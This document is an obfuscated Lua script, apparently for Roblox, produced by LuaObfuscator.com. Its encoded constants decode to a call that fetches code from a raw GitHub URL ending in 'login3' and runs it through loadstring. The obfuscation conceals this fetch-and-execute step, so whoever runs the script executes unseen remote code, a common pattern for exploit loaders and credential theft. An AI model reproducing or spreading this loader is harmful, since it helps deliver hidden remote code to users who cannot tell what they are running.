--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;while true do if (v0==5) then function v15(v16,v17)local v18=1;local v19;v16=v5(v4(v16,5),"..",function(v30)if (v2(v30,2)==79) then local v63=0;while true do if (v63==0) then v19=v1(v4(v30,1,1));return "";end end else local v64=v3(v1(v30,16));if v19 then local v73=v6(v64,v19);v19=nil;return v73;else return v64;end end end);local function v20(v31,v32,v33)if v33 then local v65=(v31/((2 + (0 -0))^(v32-(385 -(220 + 164)))))%((7 -5)^(((v33-(1 + 0)) -(v32-(1 -0))) + (2 -(4 -3))));return v65-(v65%(961 -(440 + 520)));else local v66=0 + 0;local v67;while true do if (v66==(470 -(446 + 24))) then v67=(2 + 0)^(v32-1);return (((v31%(v67 + v67))>=v67) and ((2699 -1340) -(300 + 1058))) or (1199 -(623 + 576));end end end end local function v21()local v38=0 -0;local v39;while true do if ((0 + 0)==v38) then v39=v2(v16,v18,v18);v18=v18 + (1896 -(352 + 75 + 1468));v38=1;end if (v38==(1 + 0)) then return v39;end end end local function v22()local v40,v41=v2(v16,v18,v18 + (4 -2));v18=v18 + 1 + 1;return (v41 * (1681 -(565 + 860))) + v40;end local function v23()local v42,v43,v44,v45=v2(v16,v18,v18 + 3 + 0);v18=v18 + (1003 -(119 + (2196 -(375 + 941))));return (v45 * ((107353284 -42883170) -47692898)) + (v44 * (65760 -(97 + 127))) + (v43 * (224 + 32)) + v42;end local function v24()local v46=v23();local v47=v23();return (( -(3 -1) * v20(v47,13 + 19)) + ((719 -575) -(119 + 24))) * ((897 -(707 + 188))^(v20(v47,234 -(112 + 101),31) -1023)) * ((((v20(v47,1 -0,(1781 -(831 + 935)) + 5) * ((710 -(31 + 677))^(3 + (74 -45)))) + v46)/((1014 -(54 + 958))^(13 + 39))) + (1 -0));end local function v25(v34)local v48;if  not v34 then v34=v23();if (v34==(0 -0)) then return "";end end v48=v4(v16,v18,(v18 + v34) -(1754 -(1377 + 376)));v18=v18 + v34;local v49={};for v61=1 -0, #v48 do v49[v61]=v3(v2(v4(v48,v61,v61)));end return v7(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=388 -(178 + 210);local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v50~=(1 + 1)) then else v55=nil;v56=nil;v50=1591 -(1027 + 561);end if (v50==1) then v53=nil;v54=nil;v50=2 + 0;end if (v50~=(1 + 2)) then else v57=nil;while true do local v74=0 + 0;while true do if (v74~=(0 -0)) then else if (v51~=0) then else v52={};v53={};v54={};v51=1762 -(382 + 1379);end if (v51==(1 + 1)) then local v93=0 + 0;local v94;while true do if (v93~=(0 -0)) then else v94=84 -(8 + 76);while true do if ((1 + 0)==v94) then for v102=2 -1,v23() do local v103=411 -(300 + 111);local v104;local v105;while true do if (v103==(1073 -(368 + 705))) then v104=0;v105=nil;v103=1 + 0;end if (v103==(1 + 0)) then while true do if (v104~=0) then else v105=v21();if (v20(v105,2 -1,1274 -(886 + 387))==(0 -0)) then local v134=0 + 0;local v135;local v136;local v137;local v138;while true do if (v134~=0) then else v135=0 + 0;v136=nil;v134=1 -0;end if (v134==(1 + 0)) then v137=nil;v138=nil;v134=1278 -(517 + 759);end if (v134~=(2 + 0)) then else while true do if (v135~=1) then else local v152=1621 -(958 + 663);while true do if (v152==0) then v138={v22(),v22(),nil,nil};if (v136==(0 + 0)) then local v161=0 -0;local v162;local v163;while true do if (v161==1) then while true do if (v162~=(0 + 0)) then else v163=0 -0;while true do if (v163~=0) then else v138[4 -1]=v22();v138[10 -6]=v22();break;end end break;end end break;end if ((0 + 0)==v161) then v162=0;v163=nil;v161=1769 -(605 + 1163);end end elseif (v136==(1 + 0)) then v138[6 -3]=v23();elseif (v136==(3 -1)) then v138[998 -(45 + 950)]=v23() -((3 -1)^(689 -(123 + 550)));elseif (v136~=(1577 -(345 + 1229))) then else local v171=0;local v172;while true do if (v171==(0 -0)) then v172=0 -0;while true do if (v172~=(0 -0)) then else v138[8 -5]=v23() -((42 -(30 + 10))^(37 -21));v138[4 + 0]=v22();break;end end break;end end end v152=1 -0;end if (v152~=1) then else v135=7 -5;break;end end end if (v135~=2) then else local v153=1472 -(726 + 746);while true do if (v153~=(1 + 0)) then else v135=2 + 1;break;end if (v153==0) then if (v20(v137,1 -0,1)~=1) then else v138[3 -1]=v57[v138[234 -(59 + 173)]];end if (v20(v137,617 -(284 + 331),1770 -(203 + 1565))~=(1 -0)) then else v138[412 -(172 + 237)]=v57[v138[1890 -(1744 + 143)]];end v153=744 -(311 + 432);end end end if (v135==(3 + 0)) then if (v20(v137,8 -5,3)~=(3 -2)) then else v138[9 -5]=v57[v138[4]];end v52[v102]=v138;break;end if (v135==0) then local v155=0;while true do if (v155==(2 -1)) then v135=797 -(236 + 560);break;end if (v155~=0) then else v136=v20(v105,6 -4,5 -2);v137=v20(v105,4,1484 -(565 + 913));v155=1 -0;end end end end break;end end end break;end end break;end end end v51=1421 -(1030 + 388);break;end if (v94~=(1402 -(1036 + 366))) then else local v100=1243 -(950 + 293);while true do if (v100~=(180 -(109 + 70))) then else v94=1083 -(625 + 457);break;end if (v100==(550 -(156 + 394))) then for v107=1362 -(484 + 877),v56 do local v108=1643 -(1028 + 615);local v109;local v110;local v111;local v112;while true do if (v108==(2 -1)) then v111=nil;v112=nil;v108=1688 -(1036 + 650);end if (v108~=0) then else v109=0 + 0;v110=nil;v108=2 -1;end if (v108==(1172 -(844 + 326))) then while true do if (v109==(659 -(142 + 516))) then v112=nil;while true do if (v110==(75 -(59 + 15))) then if (v111==(416 -(281 + 134))) then v112=v21()~=(0 + 0);elseif (v111==(1 + 1)) then v112=v24();elseif (v111~=(4 -1)) then else v112=v25();end v57[v107]=v112;break;end if ((1047 -(333 + 714))==v110) then local v143=0 -0;local v144;while true do if (v143~=(0 -0)) then else v144=386 -(27 + 359);while true do if ((0 -0)~=v144) then else v111=v21();v112=nil;v144=1;end if (v144==(1 + 0)) then v110=92 -(48 + 43);break;end end break;end end end end break;end if (v109==(1473 -(1191 + 282))) then local v139=0 + 0;while true do if (v139==0) then v110=483 -(345 + 138);v111=nil;v139=1 + 0;end if (v139==(2 -1)) then v109=1;break;end end end end break;end end end v55[5 -2]=v21();v100=1;end end end end break;end end end v74=1;end if (v74==(2 -1)) then if (v51~=(3 -2)) then else local v95=0 -0;local v96;while true do if (v95==(1817 -(78 + 1739))) then v96=0 -0;while true do if (v96==(0 + 0)) then v55={v52,v53,nil,v54};v56=v23();v96=1;end if (v96==1) then v57={};v51=2 + 0;break;end end break;end end end if (v51==(1882 -(262 + 1617))) then local v97=0 -0;local v98;while true do if (v97~=(0 -0)) then else v98=0 -0;while true do if (v98~=(0 -0)) then else local v101=0;while true do if ((2 -1)~=v101) then else v98=326 -(233 + 92);break;end if (v101~=0) then else for v113=1224 -(136 + 1087),v23() do v53[v113-(1 + 0)]=v28();end for v115=510 -(339 + 170),v23() do v54[v115]=v23();end v101=1 + 0;end end end if (v98==(2 -1)) then return v55;end end break;end end end break;end end end break;end if (v50==0) then v51=0;v52=nil;v50=970 -(944 + 25);end end end local function v29(v35,v36,v37)local v58=v35[1];local v59=v35[2];local v60=v35[3];return function(...)local v68=1;local v69= -1;local v70={...};local v71=v12("#",...) -1;local function v72()local v75=v58;local v76=Const;local v77=v59;local v78=v60;local v79=v27;local v80={};local v81={};local v82={};for v87=0,v71 do if (((1966 + 2097)>1478) and (v87>=v78)) then v80[v87-v78]=v70[v87 + (1343 -((1846 -(546 + 921)) + (1945 -982)))];else v82[v87]=v70[v87 + (2 -1)];end end local v83=(v71-v78) + 1;local v84;local v85;while true do local v88=(0 + 0) -0;local v89;local v90;while true do if ((v88==(310 -(273 + 13 + 24))) or ((2180 + 622)>(7114 -4167))) then v89=0 -0;v90=nil;v88=(1 + 0) -(0 + 0);end if (((4029 -(13 + 82))==(19070 -15136)) and (v88==(3 -(1213 -(456 + 755))))) then while true do if (((232 + 4214)>((394 -213) + 1776)) and (v89==((0 -0) -0))) then v90=1387 -(1071 + 316);while true do if (((3136 -1741)==1395) and (0==v90)) then local v99=0 + 0;while true do if (((2995 -(56 + 1200))==(4229 -2490)) and (v99==1)) then v90=1 + 0;break;end if ((v99==(0 + 0)) or ((2110 -(241 + 421))>=(11910 -8657))) then v84=v75[v68];v85=v84[2 -(1 + 0)];v99=1 -0;end end end if ((v90==(1 + 0)) or ((1009 + 1101)>(5945 -1757))) then if ((v85<=(3 -1)) or (1344==((228 + 361) -326))) then if ((v85<=(0 + 0)) or ((1390 + 541)>(6779 -3148))) then v82[v84[(734 -(356 + 64)) -(92 + 220)]]();elseif ((v85==(4 -3)) or ((4072 + 541)==(12403 -9158))) then local v117=0 -0;local v118;local v119;local v120;local v121;local v122;local v123;while true do if (((4634 -2203)>(2510 -(498 + 502))) and (v117==(1 -0))) then v120=nil;v121=nil;v117=1 + 1;end if ((v117==(0 + 0)) or ((7 + 1499)==(2129 -(269 + 835)))) then v118=0 -0;v119=nil;v117=1 + 0;end if ((v117==(865 -(11 + (3529 -2678)))) or ((6351 -(676 + 741))<=(1843 -(172 + 852)))) then while true do if (((1357 -(15 + 28))==1314) and (v118==(1 -0))) then v121=nil;v122=nil;v118=6 -4;end if (((3337 -(74 + 965))<(15073 -10085)) and (v118==2)) then v123=nil;while true do if ((v119==((714 -(610 + 103)) + 0)) or ((5420 -(22 + 197 + 550))<(8237 -5457))) then local v145=0 + 0;while true do if ((v145==1) or ((6153 -2166)<((2001 -(712 + 646)) + 414))) then v119=1 + 1;break;end if ((v145==0) or ((387 + 4401)<=(3598 -(562 + 86)))) then local v160=0;while true do if ((v160==(1701 -(595 + 1106))) or ((1458 -(926 + 318))>=(1379 + 2636))) then v69=(v122 + v120) -(1 -0);v123=437 -(375 + 62);v160=1;end if ((v160==(593 -(125 + 467))) or (4600<=(1456 + 591))) then v145=1;break;end end end end end if ((((3838 -(781 + 728)) -(55 + 1525))<=(7873 -5873)) and ((1941 -(373 + 1568))==v119)) then local v146=0;local v147;while true do if ((v146==((303 + 320) -(355 + 183 + 85))) or (2232>=(5688 -(213 + 967)))) then v147=0;while true do if (((11954 -7870)>938) and (v147==(1 + 0))) then v119=1;break;end if ((v147==(1828 -(107 + 384 + 1337))) or ((2959 + 1831)<=(1889 + 15))) then local v166=0 + 0;while true do if (((1167 + 2534)==((13458 -10199) + 442)) and (v166==0)) then v120=v84[771 -(688 + 81)];v121,v122=v79(v82[v120](v13(v82,v120 + (1456 -(38 + 1417)),v84[2 + (1188 -(1134 + 53))])));v166=1;end if ((v166==1) or ((16332 -11709)<=(5097 -(349 + 138)))) then v147=1820 -(1646 + 173);break;end end end end break;end end end if ((v119==(2 -0)) or (1791>=(11916 -7437))) then for v156=v120,v69 do local v157=(0 -0) + 0;local v158;while true do if ((v157==(0 -0)) or (2371<=(3247 -(670 + 243)))) then v158=0;while true do if ((3044<(10984 -7002)) and ((0 + 0 + 0)==v158)) then v123=v123 + (808 -(462 + (1755 -(1242 + 168))));v82[v156]=v121[v123];break;end end break;end end end break;end end break;end if ((v118==((1808 -(660 + 1148)) -0)) or ((16933 -12575)<=(3551 + 737))) then local v140=101 -(10 + 91);while true do if ((v140==(0 + 0)) or ((9034 -(8665 -(68 + 1897)))>=(8276 -4877))) then v119=0 + 0;v120=nil;v140=1 -0;end if (((4294 -(291 + 590))==3413) and (v140==(1502 -(504 + 997)))) then v118=3 -2;break;end end end end break;end if ((v117==((130 + 469) -(539 + 26 + 32))) or ((10919 -6398)<(97 + (1428 -(151 + 1020))))) then v122=nil;v123=nil;v117=1 + 2;end end else local v124=0 + 0;local v125;local v126;local v127;local v128;while true do if ((v124==(1470 -(171 + 1298))) or (1253<=((1201 -(119 + 226)) -(119 + 74)))) then v127=nil;v128=nil;v124=2 + 0;end if (((1628 -616)<=(2778 -(1433 + 301))) and (v124==(4 -2))) then while true do if ((v125==(1 -0)) or ((5666 -3103)>(5243 -(473 + 1372)))) then v128=nil;while true do if (((3394 -(526 + 382))==2486) and (v126==0)) then local v148=0;local v149;while true do if (((2741 -(516 + 1043))==(2663 -1481)) and (v148==(0 + 0))) then v149=0 + 0;while true do if (((8896 -5401)>2795) and (v149==((0 + 0) -0))) then local v167=979 -(528 + 451);while true do if ((1532==(1147 + 385)) and (v167==(85 -(67 + 17)))) then v149=1 + (1714 -(1311 + 403));break;end if (((5462 -2981)<(3969 -(3691 -2214))) and (v167==(0 -(1988 -(1175 + 813))))) then v127=v84[(2 + 3) -3];v128=v82[v84[3]];v167=1 + 0 + 0;end end end if ((v149==(1 -0)) or (1269>=2862)) then v126=1;break;end end break;end end end if ((v126==(293 -(25 + 267))) or (3812<=(349 + (393 -146)))) then v82[v127 + (617 -(97 + 519))]=v128;v82[v127]=v128[v84[4]];break;end end break;end if ((v125==0) or ((7784 -4946)>=(6801 -(1829 + (437 -283))))) then v126=0 -0;v127=nil;v125=(1948 -711) -(377 + 859);end end break;end if (((3556 -1938)<=(2256 + (1611 -(491 + 481)))) and ((0 + 0)==v124)) then v125=0 + 0;v126=nil;v124=2 -1;end end end elseif (((2190 + 1827)>=(49 + 301 + 645)) and (v85<=4)) then if ((v85==3) or ((1114 + 1187)<(3819 -(695 + 878)))) then v82[v84[2 + 0]]=v37[v84[1 + 1 + 1]];else v82[v84[2]]=v84[1404 -(1268 + 133)];end elseif (((59 + 1176)>(1844 -(749 + 744))) and (v85>(969 -(755 + 179 + 30)))) then do return;end else local v131=0 -0;local v132;local v133;while true do if ((v131==(1 -0)) or ((3386 + (2624 -(1642 + 43)))<=(8560 -6057))) then while true do if (((5602 -3623)==(306 + 1673)) and (v132==(0 -0))) then v133=v84[141 -(63 + 76)];v82[v133]=v82[v133](v13(v82,v133 + 1,v69));break;end end break;end if (((133 + 193 + 120)==446) and ((0 -0)==v131)) then v132=0 -(1984 -(1977 + 7));v133=nil;v131=427 -(92 + 334);end end end v68=v68 + 1;break;end end break;end end break;end end end end A,B=v27(v11(v72));if  not A[1] then local v86=v35[4][v68] or "?";error("Script error at ["   .. v86   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end return v29(v28(),{},v17)();end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F636C69636B636C69636B706F772F706C732F6D61696E2F6C6F67696E3300083O0012033O00013O001203000100023O002002000100010003001204000300044O0001000100034O00055O00026O000100012O00063O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9());break;end if (v0==3) then v10=setmetatable;v11=pcall;v12=select;v0=4;end if (2==v0) then v7=table.concat;v8=table.insert;v9=getfenv or function()return _ENV;end;v0=3;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==4) then v13=unpack or table.unpack;v14=tonumber;v15=nil;v0=5;end end end
